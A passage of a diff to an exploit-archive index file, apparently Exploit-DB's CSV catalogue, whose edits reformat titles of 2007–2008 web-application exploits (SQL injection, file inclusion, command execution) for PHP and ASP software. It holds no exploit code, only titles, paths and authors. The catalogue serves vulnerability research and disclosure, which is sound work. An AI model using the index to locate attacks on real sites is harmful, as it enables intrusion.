4384,platforms/php/webapps/4384.txt,"WebED 0.8999a - Multiple Remote File Inclusion",2007-09-08,MhZ91,php,webapps,0 4385,platforms/php/webapps/4385.txt,"AuraCMS 1.5rc - Multiple SQL Injections",2007-09-09,k1tk4t,php,webapps,0 @@ -17953,10 +17956,10 @@ id,file,description,date,author,platform,type,port 4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - 'id' Parameter SQL Injection",2007-09-13,Houssamix,php,webapps,0 4401,platforms/php/webapps/4401.txt,"Joomla! Component Joomlaradio 5.0 - Remote File Inclusion",2007-09-13,Morgan,php,webapps,0 4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 - 'skill_delete' Parameter SQL Injection",2007-09-13,"Sumit Siddharth",php,webapps,0 -4405,platforms/php/webapps/4405.txt,"Ajax File Browser 3b - (settings.inc.php approot) Remote File Inclusion",2007-09-14,"arfis project",php,webapps,0 +4405,platforms/php/webapps/4405.txt,"Ajax File Browser 3b - 'settings.inc.php approot' Remote File Inclusion",2007-09-14,"arfis project",php,webapps,0 4406,platforms/php/webapps/4406.txt,"phpFFL 1.24 - PHPFFL_FILE_ROOT Remote File Inclusion",2007-09-14,Dj7xpl,php,webapps,0 4407,platforms/php/webapps/4407.java,"PHP Webquest 2.5 - (id_actividad) SQL Injection",2007-09-14,D4real_TeaM,php,webapps,0 -4408,platforms/php/webapps/4408.pl,"JBlog 1.0 - (index.php id) SQL Injection",2007-09-14,s4mi,php,webapps,0 +4408,platforms/php/webapps/4408.pl,"JBlog 1.0 - 'index.php id' SQL Injection",2007-09-14,s4mi,php,webapps,0 4410,platforms/php/webapps/4410.php,"Gelato - 'index.php post' SQL Injection",2007-09-14,s0cratex,php,webapps,0 4411,platforms/php/webapps/4411.txt,"Chupix CMS 0.2.3 - 'download.php' Remote File Disclosure",2007-09-15,GoLd_M,php,webapps,0 4412,platforms/php/webapps/4412.pl,"KwsPHP 1.0 - 'login.php' SQL Injection",2007-09-15,s4mi,php,webapps,0 @@ -17976,23 +17979,23 @@ id,file,description,date,author,platform,type,port 4434,platforms/php/webapps/4434.txt,"phpBB Plus 1.53 - 'phpbb_root_path' Remote File Inclusion",2007-09-20,Mehrad,php,webapps,0 4435,platforms/php/webapps/4435.pl,"Flip 3.0 - Remote Admin Creation Exploit",2007-09-20,undefined1_,php,webapps,0 4436,platforms/php/webapps/4436.pl,"Flip 3.0 - Remote Password Hash Disclosure",2007-09-20,undefined1_,php,webapps,0 -4439,platforms/php/webapps/4439.txt,"neuron news 1.0 - (index.php q) Local File Inclusion",2007-09-21,Dj7xpl,php,webapps,0 +4439,platforms/php/webapps/4439.txt,"neuron news 1.0 - 'index.php q' Local File Inclusion",2007-09-21,Dj7xpl,php,webapps,0 4440,platforms/php/webapps/4440.txt,"Joomla! Component com_slideshow - Remote File Inclusion",2007-09-21,ShockShadow,php,webapps,0 4441,platforms/php/webapps/4441.txt,"iziContents rc6 - Remote File Inclusion / Local File Inclusion",2007-09-21,irk4z,php,webapps,0 4442,platforms/php/webapps/4442.txt,"CMS Made Simple 1.2 - Remote Code Execution",2007-09-21,irk4z,php,webapps,0 4443,platforms/php/webapps/4443.txt,"ClanSphere 2007.4 - 'cat_id' SQL Injection",2007-09-22,IHTeam,php,webapps,0 4444,platforms/php/webapps/4444.txt,"Black Lily 2007 - 'products.php class' SQL Injection",2007-09-22,VerY-SecReT,php,webapps,0 -4446,platforms/php/webapps/4446.txt,"Wordsmith 1.1b - (config.inc.php _path) Remote File Inclusion",2007-09-23,ShockShadow,php,webapps,0 +4446,platforms/php/webapps/4446.txt,"Wordsmith 1.1b - 'config.inc.php _path' Remote File Inclusion",2007-09-23,ShockShadow,php,webapps,0 4447,platforms/php/webapps/4447.txt,"PHP-Nuke addon Nuke Mobile Entartainment 1.0 - Local File Inclusion",2007-09-23,"BorN To K!LL",php,webapps,0 -4448,platforms/php/webapps/4448.txt,"helplink 0.1.0 - (show.php) Remote File Inclusion",2007-09-23,GoLd_M,php,webapps,0 +4448,platforms/php/webapps/4448.txt,"helplink 0.1.0 - 'show.php' Remote File Inclusion",2007-09-23,GoLd_M,php,webapps,0 4449,platforms/php/webapps/4449.txt,"phpFullAnnu (PFA) 6.0 - SQL Injection",2007-09-23,IHTeam,php,webapps,0 4451,platforms/php/webapps/4451.txt,"DFD Cart 1.1 - Multiple Remote File Inclusion",2007-09-24,BiNgZa,php,webapps,0 4454,platforms/php/webapps/4454.txt,"sk.log 0.5.3 - (skin_url) Remote File Inclusion",2007-09-24,w0cker,php,webapps,0 4456,platforms/php/webapps/4456.txt,"FrontAccounting 1.13 - Remote File Inclusion",2007-09-26,kezzap66345,php,webapps,0 4457,platforms/php/webapps/4457.txt,"Softbiz Classifieds PLUS - 'id' SQL Injection",2007-09-26,"Khashayar Fereidani",php,webapps,0 -4458,platforms/asp/webapps/4458.txt,"Novus 1.0 - (notas.asp nota_id) SQL Injection",2007-09-26,ka0x,asp,webapps,0 +4458,platforms/asp/webapps/4458.txt,"Novus 1.0 - 'notas.asp nota_id' SQL Injection",2007-09-26,ka0x,asp,webapps,0 4459,platforms/php/webapps/4459.txt,"ActiveKB KnowledgeBase 2.x - 'catId' Parameter SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps,0 -4461,platforms/php/webapps/4461.txt,"lustig.cms Beta 2.5 - (forum.php view) Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0 +4461,platforms/php/webapps/4461.txt,"lustig.cms Beta 2.5 - 'forum.php view' Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0 4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 - (repertoire) Remote File Inclusion",2007-09-27,0in,php,webapps,0 4463,platforms/php/webapps/4463.txt,"Integramod Nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0 4464,platforms/php/webapps/4464.txt,"PhFiTo 1.3.0 - (SRC_PATH) Remote File Inclusion",2007-09-28,w0cker,php,webapps,0 @@ -18010,13 +18013,13 @@ id,file,description,date,author,platform,type,port 4480,platforms/php/webapps/4480.pl,"MultiCart 1.0 - Blind SQL Injection",2007-10-02,k1tk4t,php,webapps,0 4481,platforms/php/webapps/4481.txt,"Poppawid 2.7 - (form) Remote File Inclusion",2007-10-02,0in,php,webapps,0 4482,platforms/php/webapps/4482.txt,"Web Template Management System 1.3 - SQL Injection",2007-10-04,bius,php,webapps,0 -4483,platforms/php/webapps/4483.txt,"Ossigeno CMS 2.2a3 - (footer.php) Remote File Inclusion",2007-10-04,"Nice Name Crew",php,webapps,0 +4483,platforms/php/webapps/4483.txt,"Ossigeno CMS 2.2a3 - 'footer.php' Remote File Inclusion",2007-10-04,"Nice Name Crew",php,webapps,0 4485,platforms/php/webapps/4485.txt,"Trionic Cite CMS 1.2rev9 - Remote File Inclusion",2007-10-05,GoLd_M,php,webapps,0 4486,platforms/asp/webapps/4486.txt,"Furkan Tastan Blog - SQL Injection",2007-10-05,CyberGhost,asp,webapps,0 4489,platforms/php/webapps/4489.txt,"Joomla! Component panoramic 1.0 - Remote File Inclusion",2007-10-06,NoGe,php,webapps,0 4490,platforms/php/webapps/4490.txt,"else if CMS 0.6 - Multiple Vulnerabilities",2007-10-06,"HACKERS PAL",php,webapps,0 4491,platforms/php/webapps/4491.php,"CMS Creamotion - 'securite.php' Remote File Inclusion",2007-10-06,"HACKERS PAL",php,webapps,0 -4492,platforms/php/webapps/4492.txt,"Picturesolution 2.1 - (config.php path) Remote File Inclusion",2007-10-06,Mogatil,php,webapps,0 +4492,platforms/php/webapps/4492.txt,"Picturesolution 2.1 - 'config.php path' Remote File Inclusion",2007-10-06,Mogatil,php,webapps,0 4493,platforms/php/webapps/4493.txt,"SkaDate Online 5.0/6.0 - Remote File Disclosure",2007-10-06,SnIpEr_SA,php,webapps,0 4494,platforms/php/webapps/4494.txt,"Verlihub Control Panel 1.7.x - Local File Inclusion",2007-10-07,TEAMELITE,php,webapps,0 4495,platforms/php/webapps/4495.txt,"idmos-phoenix CMS - 'aural.php' Remote File Inclusion",2007-10-07,"HACKERS PAL",php,webapps,0 @@ -18025,7 +18028,7 @@ id,file,description,date,author,platform,type,port 4499,platforms/php/webapps/4499.txt,"Joomla! Component mosmedialite451 - Remote File Inclusion",2007-10-08,k1n9k0ng,php,webapps,0 4500,platforms/php/webapps/4500.txt,"TorrentTrader Classic 1.07 - Multiple Vulnerabilities",2007-10-08,"HACKERS PAL",php,webapps,0 4501,platforms/php/webapps/4501.php,"PHP Homepage M 1.0 - galerie.php SQL Injection",2007-10-08,"[PHCN] Mahjong",php,webapps,0 -4502,platforms/php/webapps/4502.txt,"xKiosk 3.0.1i - (xkurl.php PEARPATH) Remote File Inclusion",2007-10-08,"BorN To K!LL",php,webapps,0 +4502,platforms/php/webapps/4502.txt,"xKiosk 3.0.1i - 'xkurl.php PEARPATH' Remote File Inclusion",2007-10-08,"BorN To K!LL",php,webapps,0 4503,platforms/php/webapps/4503.txt,"LiveAlbum 0.9.0 - common.php Remote File Inclusion",2007-10-08,S.W.A.T.,php,webapps,0 4504,platforms/php/webapps/4504.txt,"Softbiz Jobs & Recruitment - SQL Injection",2007-10-08,"Khashayar Fereidani",php,webapps,0 4505,platforms/php/webapps/4505.php,"LightBlog 8.4.1.1 - Remote Code Execution",2007-10-09,BlackHawk,php,webapps,0 @@ -18050,7 +18053,7 @@ id,file,description,date,author,platform,type,port 4538,platforms/php/webapps/4538.txt,"Artmedic CMS 3.4 - 'index.php' Local File Inclusion",2007-10-16,iNs,php,webapps,0 4539,platforms/php/webapps/4539.txt,"Okul Otomasyon Portal 2.0 - SQL Injection",2007-10-16,dumenci,php,webapps,0 4543,platforms/php/webapps/4543.txt,"PHPDJ 0.5 - 'djpage.php' Remote File Inclusion",2007-10-17,GoLd_M,php,webapps,0 -4544,platforms/php/webapps/4544.txt,"LimeSurvey 1.52 - (language.php) Remote File Inclusion",2007-10-17,S.W.A.T.,php,webapps,0 +4544,platforms/php/webapps/4544.txt,"LimeSurvey 1.52 - 'language.php' Remote File Inclusion",2007-10-17,S.W.A.T.,php,webapps,0 4545,platforms/php/webapps/4545.txt,"awzMB 4.2 Beta 1 - Multiple Remote File Inclusion",2007-10-18,S.W.A.T.,php,webapps,0 4546,platforms/php/webapps/4546.txt,"ZZ FlashChat 3.1 - 'help.php' Local File Inclusion",2007-10-19,d3hydr8,php,webapps,0 4547,platforms/php/webapps/4547.pl,"Simple Machines Forum (SMF) 1.1.3 - Blind SQL Injection",2007-10-20,"Michael Brooks",php,webapps,0 @@ -18070,8 +18073,8 @@ id,file,description,date,author,platform,type,port 4575,platforms/php/webapps/4575.txt,"GoSamba 1.0.1 - 'INCLUDE_PATH' Multiple Remote File Inclusion",2007-10-27,GoLd_M,php,webapps,0 4576,platforms/php/webapps/4576.txt,"JobSite Professional 2.0 - file.php SQL Injection",2007-10-28,ZynbER,php,webapps,0 4577,platforms/php/webapps/4577.txt,"CaupoShop Pro 2.x - 'action' Remote File Inclusion",2007-10-28,mozi,php,webapps,0 -4578,platforms/asp/webapps/4578.txt,"emagiC CMS.Net 4.0 - (emc.asp) SQL Injection",2007-10-28,hak3r-b0y,asp,webapps,0 -4580,platforms/php/webapps/4580.txt,"FireConfig 0.5 - (dl.php) Remote File Disclosure",2007-10-28,GoLd_M,php,webapps,0 +4578,platforms/asp/webapps/4578.txt,"emagiC CMS.Net 4.0 - 'emc.asp' SQL Injection",2007-10-28,hak3r-b0y,asp,webapps,0 +4580,platforms/php/webapps/4580.txt,"FireConfig 0.5 - 'dl.php' Remote File Disclosure",2007-10-28,GoLd_M,php,webapps,0 4581,platforms/php/webapps/4581.txt,"Sige 0.1 - sige_init.php Remote File Inclusion",2007-10-28,GoLd_M,php,webapps,0 4582,platforms/php/webapps/4582.txt,"teatro 1.6 - (basePath) Remote File Inclusion",2007-10-28,"Alkomandoz Hacker",php,webapps,0 4585,platforms/php/webapps/4585.txt,"MySpace Resource Script (MSRS) 1.21 - Remote File Inclusion",2007-10-29,r00t@zapak.com,php,webapps,0 @@ -18085,10 +18088,10 @@ id,file,description,date,author,platform,type,port 4595,platforms/php/webapps/4595.txt,"Synergiser 1.2 RC1 - Local File Inclusion / Full Path Disclosure",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 4596,platforms/php/webapps/4596.txt,"Scribe 0.2 - Remote PHP Code Execution",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 4597,platforms/php/webapps/4597.txt,"DM Guestbook 0.4.1 - Multiple Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0 -4599,platforms/php/webapps/4599.txt,"Ax Developer CMS 0.1.1 - (index.php module) Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0 -4602,platforms/php/webapps/4602.txt,"GuppY 4.6.3 - (includes.inc selskin) Remote File Inclusion",2007-11-03,irk4z,php,webapps,0 -4603,platforms/php/webapps/4603.txt,"Quick and Dirty Blog (qdblog) 0.4 - (categories.php) Local File Inclusion",2007-11-03,GoLd_M,php,webapps,0 -4604,platforms/php/webapps/4604.txt,"scWiki 1.0 Beta 2 - (common.php pathdot) Remote File Inclusion",2007-11-03,GoLd_M,php,webapps,0 +4599,platforms/php/webapps/4599.txt,"Ax Developer CMS 0.1.1 - 'index.php module' Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0 +4602,platforms/php/webapps/4602.txt,"GuppY 4.6.3 - 'includes.inc selskin' Remote File Inclusion",2007-11-03,irk4z,php,webapps,0 +4603,platforms/php/webapps/4603.txt,"Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion",2007-11-03,GoLd_M,php,webapps,0 +4604,platforms/php/webapps/4604.txt,"scWiki 1.0 Beta 2 - 'common.php pathdot' Remote File Inclusion",2007-11-03,GoLd_M,php,webapps,0 4605,platforms/php/webapps/4605.txt,"Vortex Portal 1.0.42 - Remote File Inclusion",2007-11-04,ShAy6oOoN,php,webapps,0 4606,platforms/php/webapps/4606.txt,"nuBoard 0.5 - 'site' Parameter Remote File Inclusion",2007-11-04,GoLd_M,php,webapps,0 4607,platforms/php/webapps/4607.txt,"SyndeoCMS 2.5.01 - (cmsdir) Remote File Inclusion",2007-11-04,mdx,php,webapps,0 @@ -18122,12 +18125,12 @@ id,file,description,date,author,platform,type,port 4642,platforms/php/webapps/4642.txt,"DevMass Shopping Cart 1.0 - Remote File Inclusion",2007-11-22,S.W.A.T.,php,webapps,0 4643,platforms/php/webapps/4643.py,"VigileCMS 1.8 - Stealth Remote Command Execution",2007-11-22,The:Paradox,php,webapps,0 4644,platforms/asp/webapps/4644.txt,"NetAuctionHelp 4.1 - (nsearch) SQL Injection",2007-11-22,"Aria-Security Team",asp,webapps,0 -4645,platforms/php/webapps/4645.txt,"Content Injector 1.52 - (index.php cat) SQL Injection",2007-11-22,S.W.A.T.,php,webapps,0 +4645,platforms/php/webapps/4645.txt,"Content Injector 1.52 - 'index.php cat' SQL Injection",2007-11-22,S.W.A.T.,php,webapps,0 4646,platforms/php/webapps/4646.pl,"PHPKIT 1.6.4pl1 - article.php SQL Injection",2007-11-22,Shadowleet,php,webapps,0 4647,platforms/cgi/webapps/4647.txt,"KB-Bestellsystem - 'kb_whois.cgi' Command Execution",2007-11-22,"Zero X",cgi,webapps,0 4649,platforms/php/webapps/4649.txt,"Irola My-Time 3.5 - SQL Injection",2007-11-23,"Aria-Security Team",php,webapps,0 4650,platforms/php/webapps/4650.txt,"Mp3 ToolBox 1.0 Beta 5 - (skin_file) Remote File Inclusion",2007-11-23,Crackers_Child,php,webapps,0 -4652,platforms/php/webapps/4652.txt,"Amber Script 1.0 - (show_content.php id) Local File Inclusion",2007-11-24,Crackers_Child,php,webapps,0 +4652,platforms/php/webapps/4652.txt,"Amber Script 1.0 - 'show_content.php id' Local File Inclusion",2007-11-24,Crackers_Child,php,webapps,0 4653,platforms/php/webapps/4653.txt,"WorkingOnWeb 2.0.1400 - events.php SQL Injection",2007-11-24,ka0x,php,webapps,0 4654,platforms/php/webapps/4654.txt,"PBLang 4.99.17.q - Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps,0 4655,platforms/php/webapps/4655.txt,"project alumni 1.0.9 - Cross-Site Scripting / SQL Injection",2007-11-24,tomplixsee,php,webapps,0 @@ -18141,16 +18144,16 @@ id,file,description,date,author,platform,type,port 4666,platforms/php/webapps/4666.txt,"Eurologon CMS - files.php Arbitrary File Download",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 4667,platforms/php/webapps/4667.txt,"PHP-Nuke NSN Script Depository 1.0.0 - Remote Source Disclosure",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 4668,platforms/php/webapps/4668.txt,"wpQuiz 2.7 - Multiple SQL Injections",2007-11-27,Kacper,php,webapps,0 -4669,platforms/php/webapps/4669.txt,"project alumni 1.0.9 - (index.php act) Local File Inclusion",2007-11-27,tomplixsee,php,webapps,0 +4669,platforms/php/webapps/4669.txt,"project alumni 1.0.9 - 'index.php act' Local File Inclusion",2007-11-27,tomplixsee,php,webapps,0 4670,platforms/php/webapps/4670.txt,"PHP-CON 1.3 - 'include.php' Remote File Inclusion",2007-11-28,GoLd_M,php,webapps,0 4671,platforms/php/webapps/4671.txt,"EHCP 0.22.8 - Multiple Remote File Inclusion",2007-11-28,MhZ91,php,webapps,0 4672,platforms/php/webapps/4672.txt,"Charrays CMS 0.9.3 - Multiple Remote File Inclusion",2007-11-28,MhZ91,php,webapps,0 4674,platforms/php/webapps/4674.txt,"TuMusika Evolution 1.7R5 - Remote File Disclosure",2007-11-28,GoLd_M,php,webapps,0 4675,platforms/php/webapps/4675.txt,"NoAh 0.9 pre 1.2 - (filepath) Remote File Disclosure",2007-11-28,GoLd_M,php,webapps,0 -4676,platforms/php/webapps/4676.txt,"Web-MeetMe 3.0.3 - (play.php) Remote File Disclosure",2007-11-29,Evil.Man,php,webapps,0 +4676,platforms/php/webapps/4676.txt,"Web-MeetMe 3.0.3 - 'play.php' Remote File Disclosure",2007-11-29,Evil.Man,php,webapps,0 4677,platforms/php/webapps/4677.txt,"WebED 0.0.9 - 'index.php' Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 4678,platforms/php/webapps/4678.php,"Seditio CMS 121 - SQL Injection",2007-11-29,InATeam,php,webapps,0 -4679,platforms/php/webapps/4679.txt,"KML share 1.1 - (region.php layer) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 +4679,platforms/php/webapps/4679.txt,"KML share 1.1 - 'region.php layer' Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 4680,platforms/php/webapps/4680.txt,"LearnLoop 2.0beta7 - (sFilePath) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 4681,platforms/php/webapps/4681.txt,"ftp Admin 0.1.0 - Local File Inclusion / Cross-Site Scripting / Authentication Bypass",2007-11-29,Omni,php,webapps,0 4684,platforms/php/webapps/4684.txt,"tellmatic 1.0.7 - Multiple Remote File Inclusion",2007-12-01,ShAy6oOoN,php,webapps,0 @@ -18159,11 +18162,11 @@ id,file,description,date,author,platform,type,port 4687,platforms/asp/webapps/4687.htm,"Snitz Forums 2000 - Active.asp SQL Injection",2007-12-03,BugReport.IR,asp,webapps,0 4691,platforms/php/webapps/4691.txt,"Joomla! / Mambo Component rsgallery 2.0b5 - 'catid' Parameter SQL Injection",2007-12-05,K-159,php,webapps,0 4693,platforms/php/webapps/4693.txt,"SineCMS 2.3.4 - Calendar SQL Injection",2007-12-05,KiNgOfThEwOrLd,php,webapps,0 -4694,platforms/php/webapps/4694.txt,"EZContents 1.4.5 - (index.php link) Remote File Disclosure",2007-12-05,p4imi0,php,webapps,0 +4694,platforms/php/webapps/4694.txt,"EZContents 1.4.5 - 'index.php link' Remote File Disclosure",2007-12-05,p4imi0,php,webapps,0 4695,platforms/php/webapps/4695.txt,"WordPress Plugin PictPress 0.91 - Remote File Disclosure",2007-12-05,GoLd_M,php,webapps,0 4696,platforms/php/webapps/4696.txt,"SerWeb 2.0.0 dev1 2007-02-20 - Multiple Remote File Inclusion / Local File Inclusion Vulnerabilities",2007-12-06,GoLd_M,php,webapps,0 4697,platforms/asp/webapps/4697.txt,"MWOpen E-Commerce - leggi_commenti.asp SQL Injection",2007-12-06,KiNgOfThEwOrLd,asp,webapps,0 -4704,platforms/php/webapps/4704.txt,"PolDoc CMS 0.96 - (download_file.php) File Disclosure",2007-12-08,GoLd_M,php,webapps,0 +4704,platforms/php/webapps/4704.txt,"PolDoc CMS 0.96 - 'download_file.php' File Disclosure",2007-12-08,GoLd_M,php,webapps,0 4705,platforms/php/webapps/4705.txt,"Flat PHP Board 1.2 - Multiple Vulnerabilities",2007-12-09,KiNgOfThEwOrLd,php,webapps,0 4706,platforms/php/webapps/4706.txt,"Content Injector 1.53 - 'index.php' SQL Injection",2007-12-09,S.W.A.T.,php,webapps,0 4707,platforms/php/webapps/4707.txt,"Ace Image Hosting Script - 'id' SQL Injection",2007-12-09,t0pP8uZz,php,webapps,0 @@ -18181,7 +18184,7 @@ id,file,description,date,author,platform,type,port 4726,platforms/php/webapps/4726.txt,"CityWriter 0.9.7 - head.php Remote File Inclusion",2007-12-13,RoMaNcYxHaCkEr,php,webapps,0 4727,platforms/php/webapps/4727.txt,"CMS Galaxie Software - (category_id) SQL Injection",2007-12-13,MurderSkillz,php,webapps,0 4728,platforms/php/webapps/4728.txt,"Mms Gallery PHP 1.0 - 'id' Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0 -4729,platforms/php/webapps/4729.txt,"xml2owl 0.1.1 - (filedownload.php) Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0 +4729,platforms/php/webapps/4729.txt,"xml2owl 0.1.1 - 'filedownload.php' Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0 4730,platforms/asp/webapps/4730.txt,"hosting controller 6.1 hot fix 3.3 - Multiple Vulnerabilities",2007-12-13,BugReport.IR,asp,webapps,0 4731,platforms/php/webapps/4731.php,"Adult Script 1.6 - Unauthorized Administrative Access",2007-12-13,Liz0ziM,php,webapps,0 4733,platforms/php/webapps/4733.txt,"123tkShop 0.9.1 - Remote Authentication Bypass",2007-12-14,"Michael Brooks",php,webapps,0 @@ -18206,16 +18209,16 @@ id,file,description,date,author,platform,type,port 4767,platforms/php/webapps/4767.txt,"Social Engine 2.0 - Multiple Local File Inclusion",2007-12-21,MhZ91,php,webapps,0 4768,platforms/php/webapps/4768.py,"Shadowed Portal 5.7d3 - Remote Command Execution",2007-12-21,The:Paradox,php,webapps,0 4769,platforms/php/webapps/4769.txt,"Shadowed Portal 5.7d3 - (POST) Remote File Inclusion",2007-12-21,The:Paradox,php,webapps,0 -4770,platforms/php/webapps/4770.txt,"Wallpaper Site 1.0.09 - (category.php) SQL Injection",2007-12-22,Koller,php,webapps,0 +4770,platforms/php/webapps/4770.txt,"Wallpaper Site 1.0.09 - 'category.php' SQL Injection",2007-12-22,Koller,php,webapps,0 4771,platforms/php/webapps/4771.txt,"IP Reg 0.3 - Multiple SQL Injections",2007-12-22,MhZ91,php,webapps,0 4772,platforms/php/webapps/4772.txt,"zBlog 1.2 - SQL Injection",2007-12-22,Houssamix,php,webapps,0 -4774,platforms/php/webapps/4774.pl,"PHP ZLink 0.3 - (go.php) SQL Injection",2007-12-23,DNX,php,webapps,0 +4774,platforms/php/webapps/4774.pl,"PHP ZLink 0.3 - 'go.php' SQL Injection",2007-12-23,DNX,php,webapps,0 4775,platforms/php/webapps/4775.txt,"Adult Script 1.6.5 - Multiple SQL Injections",2007-12-23,MhZ91,php,webapps,0 4776,platforms/php/webapps/4776.txt,"MMSLamp - (idpro) SQL Injection",2007-12-23,x0kster,php,webapps,0 4777,platforms/php/webapps/4777.txt,"WebSihirbazi 5.1.1 - (pageid) SQL Injection",2007-12-24,bypass,php,webapps,0 4778,platforms/php/webapps/4778.txt,"MeGaCheatZ 1.1 - Multiple SQL Injections",2007-12-24,MhZ91,php,webapps,0 4779,platforms/php/webapps/4779.php,"CuteNews 1.4.5 - Admin Password md5 Hash Fetching Exploit",2007-12-24,waraxe,php,webapps,0 -4780,platforms/php/webapps/4780.txt,"ThemeSiteScript 1.0 - (index.php loadadminpage) Remote File Inclusion",2007-12-24,Koller,php,webapps,0 +4780,platforms/php/webapps/4780.txt,"ThemeSiteScript 1.0 - 'index.php loadadminpage' Remote File Inclusion",2007-12-24,Koller,php,webapps,0 4781,platforms/php/webapps/4781.php,"Jupiter 1.1.5ex - Privilege Escalation",2007-12-24,BugReport.IR,php,webapps,0 4782,platforms/php/webapps/4782.txt,"Agares phpAutoVideo 2.21 - Remote / Local File Inclusion",2007-12-24,MhZ91,php,webapps,0 4783,platforms/php/webapps/4783.txt,"Joomla! Component mosDirectory 2.3.2 - Remote File Inclusion",2007-12-24,ShockShadow,php,webapps,0 @@ -18250,7 +18253,7 @@ id,file,description,date,author,platform,type,port 4817,platforms/php/webapps/4817.txt,"w-Agora 4.2.1 - 'cat' Parameter SQL Injection",2007-12-30,IHTeam,php,webapps,0 4821,platforms/php/webapps/4821.txt,"IPTBB 0.5.4 - 'id' Parameter SQL Injection",2007-12-31,MhZ91,php,webapps,0 4822,platforms/php/webapps/4822.txt,"MyPHP Forum 3.0 - (Final) Multiple SQL Injection",2007-12-31,x0kster,php,webapps,0 -4823,platforms/php/webapps/4823.pl,"ZenPhoto 1.1.3 - (rss.php albumnr) SQL Injection",2007-12-31,Silentz,php,webapps,0 +4823,platforms/php/webapps/4823.pl,"ZenPhoto 1.1.3 - 'rss.php albumnr' SQL Injection",2007-12-31,Silentz,php,webapps,0 4824,platforms/asp/webapps/4824.py,"oneSCHOOL - admin/login.asp SQL Injection",2007-12-31,Guga360,asp,webapps,0 4826,platforms/php/webapps/4826.pl,"WebPortal CMS 0.6.0 - 'index.php' SQL Injection",2007-12-31,x0kster,php,webapps,0 4827,platforms/php/webapps/4827.txt,"Joomla! Component PU Arcade 2.1.3 - SQL Injection",2007-12-31,Houssamix,php,webapps,0 @@ -18293,7 +18296,7 @@ id,file,description,date,author,platform,type,port 4871,platforms/php/webapps/4871.php,"UploadImage/UploadScript 1.0 - Remote Change Admin Password",2008-01-09,Dj7xpl,php,webapps,0 4872,platforms/php/webapps/4872.txt,"PHP Webquest 2.6 - Get Database Credentials",2008-01-09,MhZ91,php,webapps,0 4876,platforms/php/webapps/4876.txt,"Tuned Studios Templates - Local File Inclusion",2008-01-09,DSecRG,php,webapps,0 -4879,platforms/php/webapps/4879.php,"Docebo 3.5.0.3 - (lib.regset.php) Command Execution",2008-01-09,EgiX,php,webapps,0 +4879,platforms/php/webapps/4879.php,"Docebo 3.5.0.3 - 'lib.regset.php' Command Execution",2008-01-09,EgiX,php,webapps,0 4880,platforms/php/webapps/4880.php,"DomPHP 0.81 - Remote Add Administrator Exploit",2008-01-10,j0j0,php,webapps,0 4882,platforms/php/webapps/4882.txt,"MTCMS 2.0 - SQL Injection",2008-01-10,"Virangar Security",php,webapps,0 4883,platforms/php/webapps/4883.txt,"DomPHP 0.81 - 'index.php' Remote File Inclusion",2008-01-10,Houssamix,php,webapps,0 @@ -18303,7 +18306,7 @@ id,file,description,date,author,platform,type,port 4888,platforms/php/webapps/4888.txt,"DomPHP 0.81 - 'cat' Parameter SQL Injection",2008-01-11,MhZ91,php,webapps,0 4889,platforms/php/webapps/4889.txt,"vcart 3.3.2 - Multiple Remote File Inclusion",2008-01-11,k1n9k0ng,php,webapps,0 4890,platforms/php/webapps/4890.txt,"AJchat 0.10 - unset() bug SQL Injection",2008-01-11,"Eugene Minaev",php,webapps,0 -4891,platforms/php/webapps/4891.php,"Docebo 3.5.0.3 - (lib.regset.php/non-blind) SQL Injection",2008-01-11,rgod,php,webapps,0 +4891,platforms/php/webapps/4891.php,"Docebo 3.5.0.3 - 'lib.regset.php/non-blind' SQL Injection",2008-01-11,rgod,php,webapps,0 4895,platforms/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 - 'id' SQL Injection",2008-01-11,"Raw Security",php,webapps,0 4896,platforms/php/webapps/4896.pl,"0DayDB 2.3 - 'id' Parameter Remote Authentication Bypass",2008-01-11,Pr0metheuS,php,webapps,0 4897,platforms/php/webapps/4897.pl,"photokron 1.7 - Remote Database Disclosure",2008-01-11,Pr0metheuS,php,webapps,0 @@ -18506,7 +18509,7 @@ id,file,description,date,author,platform,type,port 5173,platforms/php/webapps/5173.txt,"phpQLAdmin 2.2.7 - Multiple Remote File Inclusion",2008-02-22,RoMaNcYxHaCkEr,php,webapps,0 5174,platforms/php/webapps/5174.txt,"Quantum Game Library 0.7.2c - Remote File Inclusion",2008-02-22,RoMaNcYxHaCkEr,php,webapps,0 5175,platforms/php/webapps/5175.txt,"PHPProfiles 4.5.2 Beta - 'body_comm.inc.php' Remote File Inclusion",2008-02-23,CraCkEr,php,webapps,0 -5176,platforms/php/webapps/5176.txt,"Quinsonnas Mail Checker 1.55 - (footer.php) Remote File Inclusion",2008-02-23,GoLd_M,php,webapps,0 +5176,platforms/php/webapps/5176.txt,"Quinsonnas Mail Checker 1.55 - 'footer.php' Remote File Inclusion",2008-02-23,GoLd_M,php,webapps,0 5177,platforms/php/webapps/5177.txt,"Joomla! Component simple shop 2.0 - SQL Injection",2008-02-23,S@BUN,php,webapps,0 5178,platforms/php/webapps/5178.txt,"Mambo Component garyscookbook 1.1.1 - SQL Injection",2008-02-23,S@BUN,php,webapps,0 5179,platforms/php/webapps/5179.txt,"PHPUserBase 1.3b - 'unverified.inc.php' Local File Inclusion",2008-02-23,BeyazKurt,php,webapps,0 @@ -20436,7 +20439,7 @@ id,file,description,date,author,platform,type,port 7657,platforms/php/webapps/7657.txt,"webSPELL 4.01.02 - 